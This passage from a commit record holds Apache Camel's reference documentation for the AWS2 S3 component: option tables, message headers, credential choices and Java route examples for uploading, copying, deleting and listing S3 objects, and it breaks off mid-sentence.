docs\n","repos":"pax95\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,apache\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,christophd\/camel,pax95\/camel,christophd\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-s3-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-s3-component.adoc","new_contents":"[[aws2-s3-component]]\n= AWS S3 Storage Service Component\n\/\/THIS FILE IS COPIED: EDIT THE SOURCE FILE:\n:page-source: components\/camel-aws\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc\n:docTitle: AWS S3 Storage Service\n:artifactId: camel-aws2-s3\n:description: Store and retrieve objects from AWS S3 Storage Service using AWS SDK version 2.x.\n:since: 3.2\n:supportLevel: Stable\n:component-header: Both producer and consumer are supported\ninclude::{cq-version}@camel-quarkus:ROOT:partial$reference\/components\/aws2-s3.adoc[opts=optional]\n\/\/Manually maintained attributes\n:group: AWS\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 S3 component supports storing and retrieving objects from\/to\nhttps:\/\/aws.amazon.com\/s3[Amazon's S3] service.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon S3. More information is available at\nhttps:\/\/aws.amazon.com\/s3[Amazon S3].\n\n== URI Format\n\n------------------------------\naws2-s3:\/\/bucketNameOrArn[?options]\n------------------------------\n\nThe bucket will be created if it don't already exists. +\n You can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n\n\/\/ component-configure options: START\n== Configuring Options\n\nCamel components are configured on two separate levels:\n\n- component level\n- endpoint level\n\n=== Configuring Component Options\n\nThe component level is the highest level which holds general and common configurations that are inherited by the endpoints.\nFor example a component may have security settings, credentials for authentication, urls for network connection and so forth.\n\nSome components only have a few options, and others may have many. Because components typically have pre configured defaults\nthat are commonly used, then you may often only need to configure a few options on a component; or none at all.\n\nConfiguring components can be done with the xref:latest@manual::component-dsl.adoc[Component DSL],\nin a configuration file (application.properties|yaml), or directly with Java code.\n\n=== Configuring Endpoint Options\n\nWhere you find yourself configuring the most is on endpoints, as endpoints often have many options, which allows you to\nconfigure what you need the endpoint to do. The options are also categorized into whether the endpoint is used as consumer (from)\nor as a producer (to), or used for both.\n\nConfiguring endpoints is most often done directly in the endpoint URI as path and query parameters. You can also use\nthe xref:latest@manual::Endpoint-dsl.adoc[Endpoint DSL] as a _type safe_ way of configuring endpoints.\n\nA good practice when configuring options is to use xref:latest@manual::using-propertyplaceholder.adoc[Property Placeholders],\nwhich allows to not hardcode urls, port numbers, sensitive information, and other settings.\nIn other words placeholders allows to externalize the configuration from your code, and gives more flexibility and reuse.\n\nThe following two sections lists all the options, firstly for the component followed by the endpoint.\n\/\/ component-configure options: END\n\n\/\/ component options: START\n== Component Options\n\n\nThe AWS S3 Storage Service component supports 50 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *configuration* (common) | The component configuration | | AWS2S3Configuration\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. | false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *autowiredEnabled* (advanced) | Whether autowiring is enabled. This is used for automatic autowiring options (the option must be marked as autowired) by looking up in the registry to find if there is a single instance of matching type, which then gets configured on the component. This can be used for automatic configuring JDBC data sources, JMS connection factories, AWS Clients, etc. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\n== Endpoint Options\n\nThe AWS S3 Storage Service endpoint is configured using URI syntax:\n\n----\naws2-s3:\/\/bucketNameOrArn\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bucketNameOrArn* | *Required* Bucket name or ARN | | String\n|===\n\n\n=== Query Parameters (68 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *amazonS3Client* (common) | *Autowired* Reference to a com.amazonaws.services.s3.AmazonS3 in the registry. | | S3Client\n| *amazonS3Presigner* (common) | *Autowired* An S3 Presigner for Request, used mainly in createDownloadLink operation | | S3Presigner\n| *autoCreateBucket* (common) | Setting the autocreation of the S3 bucket bucketName. This will apply also in case of moveAfterRead option enabled and it will create the destinationBucket if it doesn't exist already. | false | boolean\n| *overrideEndpoint* (common) | Set the need for overidding the endpoint. This option needs to be used in combination with uriEndpointOverride option | false | boolean\n| *pojoRequest* (common) | If we want to use a POJO request as body or not | false | boolean\n| *policy* (common) | The policy for this queue to set in the com.amazonaws.services.s3.AmazonS3#setBucketPolicy() method. | | String\n| *proxyHost* (common) | To define a proxy host when instantiating the SQS client | | String\n| *proxyPort* (common) | Specify a proxy port to be used inside the client definition. | | Integer\n| *proxyProtocol* (common) | To define a proxy protocol when instantiating the S3 client. There are 2 enums and the value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (common) | The region in which S3 client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (common) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *uriEndpointOverride* (common) | Set the overriding uri endpoint. This option needs to be used in combination with overrideEndpoint option | | String\n| *useDefaultCredentialsProvider* (common) | Set whether the S3 client should expect to load credentials through a default credentials provider or to expect static credentials to be passed in. | false | boolean\n| *customerAlgorithm* (common) | Define the customer algorithm to use in case CustomerKey is enabled | | String\n| *customerKeyId* (common) | Define the id of Customer key to use in case CustomerKey is enabled | | String\n| *customerKeyMD5* (common) | Define the MD5 of Customer key to use in case CustomerKey is enabled | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *deleteAfterRead* (consumer) | Delete objects from S3 after they have been retrieved. The delete is only performed if the Exchange is committed. If a rollback occurs, the object is not deleted. If this option is false, then the same objects will be retrieve over and over again on the polls. Therefore you need to use the Idempotent Consumer EIP in the route to filter out duplicates. You can filter using the AWS2S3Constants#BUCKET_NAME and AWS2S3Constants#KEY headers, or only the AWS2S3Constants#KEY header. | true | boolean\n| *delimiter* (consumer) | The delimiter which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *destinationBucket* (consumer) | Define the destination bucket where an object must be moved when moveAfterRead is set to true. | | String\n| *destinationBucketPrefix* (consumer) | Define the destination bucket prefix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *destinationBucketSuffix* (consumer) | Define the destination bucket suffix to use when an object must be moved and moveAfterRead is set to true. | | String\n| *doneFileName* (consumer) | If provided, Camel will only consume files if a done file exists. | | String\n| *fileName* (consumer) | To get the object from the bucket with the given file name | | String\n| *ignoreBody* (consumer) | If it is true, the S3 Object Body will be ignored completely, if it is set to false the S3 Object will be put in the body. Setting this to true, will override any behavior defined by includeBody option. | false | boolean\n| *includeBody* (consumer) | If it is true, the S3Object exchange will be consumed and put into the body and closed. If false the S3Object stream will be put raw into the body and the headers will be set with the S3 object metadata. This option is strongly related to autocloseBody option. In case of setting includeBody to true because the S3Object stream will be consumed then it will also be closed, while in case of includeBody false then it will be up to the caller to close the S3Object stream. However setting autocloseBody to true when includeBody is false it will schedule to close the S3Object stream automatically on exchange completion. | true | boolean\n| *includeFolders* (consumer) | If it is true, the folders\/directories will be consumed. If it is false, they will be ignored, and Exchanges will not be created for those | true | boolean\n| *maxConnections* (consumer) | Set the maxConnections parameter in the S3 client configuration | 60 | int\n| *maxMessagesPerPoll* (consumer) | Gets the maximum number of messages as a limit to poll at each polling. Gets the maximum number of messages as a limit to poll at each polling. The default value is 10. Use 0 or a negative number to set it as unlimited. | 10 | int\n| *moveAfterRead* (consumer) | Move objects from S3 bucket to a different bucket after they have been retrieved. To accomplish the operation the destinationBucket option must be set. The copy bucket operation is only performed if the Exchange is committed. If a rollback occurs, the object is not moved. | false | boolean\n| *prefix* (consumer) | The prefix which is used in the com.amazonaws.services.s3.model.ListObjectsRequest to only consume objects we are interested in. | | String\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *autocloseBody* (consumer) | If this option is true and includeBody is false, then the S3Object.close() method will be called on exchange completion. This option is strongly related to includeBody option. In case of setting includeBody to false and autocloseBody to false, it will be up to the caller to close the S3Object stream. Setting autocloseBody to true, will close the S3Object stream automatically. | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. There are 3 enums and the value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *batchMessageNumber* (producer) | The number of messages composing a batch in streaming upload mode | 10 | int\n| *batchSize* (producer) | The batch size (in bytes) in streaming upload mode | 1000000 | int\n| *deleteAfterWrite* (producer) | Delete file object after the S3 file has been uploaded | false | boolean\n| *keyName* (producer) | Setting the key name for an element in the bucket through endpoint parameter | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *multiPartUpload* (producer) | If it is true, camel will upload the file with multi part format, the part size is decided by the option of partSize | false | boolean\n| *namingStrategy* (producer) | The naming strategy to use in streaming upload mode. There are 2 enums and the value can be one of: progressive, random | progressive | AWSS3NamingStrategyEnum\n| *operation* (producer) | The operation to do in case the user don't want to do only an upload. There are 8 enums and the value can be one of: copyObject, listObjects, deleteObject, deleteBucket, listBuckets, getObject, getObjectRange, createDownloadLink | | AWS2S3Operations\n| *partSize* (producer) | Setup the partSize which is used in multi part upload, the default size is 25M. | 26214400 | long\n| *restartingPolicy* (producer) | The restarting policy to use in streaming upload mode. There are 2 enums and the value can be one of: override, lastPart | override | AWSS3RestartingPolicyEnum\n| *storageClass* (producer) | The storage class to set in the com.amazonaws.services.s3.model.PutObjectRequest request. | | String\n| *streamingUploadMode* (producer) | When stream mode is true the upload to bucket will be done in streaming | false | boolean\n| *streamingUploadTimeout* (producer) | While streaming upload mode is true, this option set the timeout to complete upload | | long\n| *awsKMSKeyId* (producer) | Define the id of KMS key to use in case KMS is enabled | | String\n| *useAwsKMS* (producer) | Define if KMS must be used or not | false | boolean\n| *useCustomerKey* (producer) | Define if Customer Key must be used or not | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. There are 6 enums and the value can be one of: TRACE, DEBUG, INFO, WARN, ERROR, OFF | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component. Use value spring or quartz for built in scheduler | none | Object\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. There are 7 enums and the value can be one of: NANOSECONDS, MICROSECONDS, MILLISECONDS, SECONDS, MINUTES, HOURS, DAYS | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\nRequired S3 component options\n\nYou have to provide the amazonS3Client in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/s3[Amazon's S3].\n\n== Batch Consumer\n\nThis component implements the Batch Consumer.\n\nThis allows you for instance to know how many messages exists in this\nbatch and for instance let the Aggregator\naggregate this number of messages.\n\n== Usage\n\nFor example in order to read file `hello.txt` from bucket `helloBucket`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/helloBucket?accessKey=yourAccessKey&secretKey=yourSecretKey&prefix=hello.txt\")\n .to(\"file:\/var\/downloaded\");\n--------------------------------------------------------------------------------\n\n=== Message headers evaluated by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3BucketName` |`String` |The bucket Name which this object will be stored or which will be used for the current operation\n\n|`CamelAwsS3BucketDestinationName` |`String` |The bucket Destination Name which will be used for the current operation\n\n|`CamelAwsS3ContentLength` |`Long` |The content length of this object.\n\n|`CamelAwsS3ContentType` |`String` |The content type of this object.\n\n|`CamelAwsS3ContentControl` |`String` |The content control of this object.\n\n|`CamelAwsS3ContentDisposition` |`String` |The content disposition of this object.\n\n|`CamelAwsS3ContentEncoding` |`String` |The content encoding of this object.\n\n|`CamelAwsS3ContentMD5` |`String` |The md5 checksum of this object.\n\n|`CamelAwsS3DestinationKey` |`String` |The Destination key which will be used for the current operation\n\n|`CamelAwsS3Key` |`String` |The key under which this object will be stored or which will be used for the current operation\n\n|`CamelAwsS3LastModified` |`java.util.Date` |The last modified timestamp of this object.\n\n|`CamelAwsS3Operation` |`String` |The operation to perform. Permitted values are copyObject, deleteObject, listBuckets, deleteBucket, listObjects\n\n|`CamelAwsS3StorageClass` |`String` |The storage class of this object.\n\n|`CamelAwsS3CannedAcl` |`String` |The canned acl that will be applied to the object. see\n`software.amazon.awssdk.services.s3.model.ObjectCannedACL` for allowed\nvalues.\n\n|`CamelAwsS3Acl` |`software.amazon.awssdk.services.s3.model.BucketCannedACL` |A well constructed Amazon S3 Access Control List object.\nsee `software.amazon.awssdk.services.s3.model.BucketCannedACL` for more details\n\n|`CamelAwsS3Headers` |`Map<String,String>` |Support to get or set custom objectMetadata headers.\n\n|`CamelAwsS3ServerSideEncryption` |String |Sets the server-side encryption algorithm when encrypting\nthe object using AWS-managed keys. For example use AES256.\n\n|`CamelAwsS3VersionId` |`String` |The version Id of the object to be stored or returned from the current operation\n|`CamelAwsS3Metadata` |`Map<String, String>` |A map of metadata stored with the object in S3.\n|=======================================================================\n\n=== Message headers set by the S3 producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n|`CamelAwsS3ETag` |`String` |The ETag value for the newly uploaded object.\n\n|`CamelAwsS3VersionId` |`String` |The *optional* version ID of the newly uploaded object.\n\n\n|=======================================================================\n\n=== Message headers set by the S3 consumer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsS3Key` |`String` |The key under which this object is stored.\n\n|`CamelAwsS3BucketName` |`String` |The name of the bucket in which this object is contained.\n\n|`CamelAwsS3ETag` |`String` |The hex encoded 128-bit MD5 digest of the associated object according to\nRFC 1864. This data is used as an integrity check to verify that the\ndata received by the caller is the same data that was sent by Amazon S3.\n\n|`CamelAwsS3LastModified` |`Date` |The value of the Last-Modified header, indicating the date and time at\nwhich Amazon S3 last recorded a modification to the associated object.\n\n|`CamelAwsS3VersionId` |`String` |The version ID of the associated Amazon S3 object if available. Version\nIDs are only assigned to objects when an object is uploaded to an Amazon\nS3 bucket that has object versioning enabled.\n\n|`CamelAwsS3ContentType` |`String` |The Content-Type HTTP header, which indicates the type of content stored\nin the associated object. The value of this header is a standard MIME\ntype.\n\n|`CamelAwsS3ContentMD5` |`String` |The base64 encoded 128-bit MD5 digest of the associated object (content\n- not including headers) according to RFC 1864. This data is used as a\nmessage integrity check to verify that the data received by Amazon S3 is\nthe same data that the caller sent.\n\n|`CamelAwsS3ContentLength` |`Long` |The Content-Length HTTP header indicating the size of the associated\nobject in bytes.\n\n|`CamelAwsS3ContentEncoding` |`String` |The *optional* Content-Encoding HTTP header specifying what content\nencodings have been applied to the object and what decoding mechanisms\nmust be applied in order to obtain the media-type referenced by the\nContent-Type field.\n\n|`CamelAwsS3ContentDisposition` |`String` |The *optional* Content-Disposition HTTP header, which specifies\npresentational information such as the recommended filename for the\nobject to be saved as.\n\n|`CamelAwsS3ContentControl` |`String` |The *optional* Cache-Control HTTP header which allows the user to\nspecify caching behavior along the HTTP request\/reply chain.\n\n|`CamelAwsS3ServerSideEncryption` |String |The server-side encryption algorithm when encrypting the\nobject using AWS-managed keys.\n|=======================================================================\n\n=== S3 Producer operations\n\nCamel-AWS2-S3 component provides the following operation on the producer side:\n\n- copyObject\n- deleteObject\n- listBuckets\n- deleteBucket\n- listObjects\n- getObject (this will return an S3Object instance)\n- getObjectRange (this will return an S3Object instance)\n- createDownloadLink\n\nIf you don't specify an operation explicitly the producer will do:\n- a single file upload\n- a multipart upload if multiPartUpload option is enabled\n\n=== Advanced AmazonS3 configuration\n\nIf your Camel Application is running behind a firewall or if you need to\nhave more control over the `S3Client` instance configuration, you can\ncreate your own instance and refer to it in your Camel aws2-s3 component configuration:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"aws2-s3:\/\/MyBucket?amazonS3Client=#client&delay=5000&maxMessagesPerPoll=5\")\n.to(\"mock:result\");\n--------------------------------------------------------------------------------\n\n=== Use KMS with the S3 component\n\nTo use AWS KMS to encrypt\/decrypt data by using AWS infrastructure you can use the options introduced in 2.21.x like in the following example\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"file:tmp\/test?fileName=test.txt\")\n .setHeader(S3Constants.KEY, constant(\"testFile\"))\n .to(\"aws2-s3:\/\/mybucket?amazonS3Client=#client&useAwsKMS=true&awsKMSKeyId=3f0637ad-296a-3dfe-a796-e60654fb128c\");\n--------------------------------------------------------------------------------\n\nIn this way you'll ask to S3, to use the KMS key 3f0637ad-296a-3dfe-a796-e60654fb128c, to encrypt the file test.txt. When you'll ask to download this file, the decryption will be done directly before the download.\n\n=== Static credentials vs Default Credential Provider\n\nYou have the possibility of avoiding the usage of explicit static credentials, by specifying the useDefaultCredentialsProvider option and set it to true.\n\n - Java system properties - aws.accessKeyId and aws.secretKey\n - Environment variables - AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.\n - Web Identity Token from AWS STS.\n - The shared credentials and config files.\n - Amazon ECS container credentials - loaded from the Amazon ECS if the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is set.\n - Amazon EC2 Instance profile credentials. \n\nFor more information about this you can look at https:\/\/docs.aws.amazon.com\/sdk-for-java\/latest\/developer-guide\/credentials.html[AWS credentials documentation]\n\n=== S3 Producer Operation examples\n\n- Single Upload: This operation will upload a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camel.txt\");\n exchange.getIn().setBody(\"Camel rocks!\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will upload the file camel.txt with the content \"Camel rocks!\" in the mycamelbucket bucket\n\n- Multipart Upload: This operation will perform a multipart upload of a file to S3 based on the body content\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(AWS2S3Constants.KEY, \"empty.txt\");\n exchange.getIn().setBody(new File(\"src\/empty.txt\"));\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&multiPartUpload=true&autoCreateBucket=true&partSize=1048576\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will perform a multipart upload of the file empty.txt with based on the content the file src\/empty.txt in the mycamelbucket bucket\n\n- CopyObject: this operation copy an object from one bucket to a different one\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.BUCKET_DESTINATION_NAME, \"camelDestinationBucket\");\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n exchange.getIn().setHeader(S3Constants.DESTINATION_KEY, \"camelDestinationKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=copyObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will copy the object with the name expressed in the header camelDestinationKey to the camelDestinationBucket bucket, from the bucket mycamelbucket.\n\n- DeleteObject: this operation deletes an object from a bucket\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\").process(new Processor() {\n\n @Override\n public void process(Exchange exchange) throws Exception {\n exchange.getIn().setHeader(S3Constants.KEY, \"camelKey\");\n }\n })\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=deleteObject\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation will delete the object camelKey from the bucket mycamelbucket.\n\n- ListBuckets: this operation list the buckets for this account in this region\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"direct:start\")\n .to(\"aws2-s3:\/\/mycamelbucket?amazonS3Client=#amazonS3Client&operation=listBuckets\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation 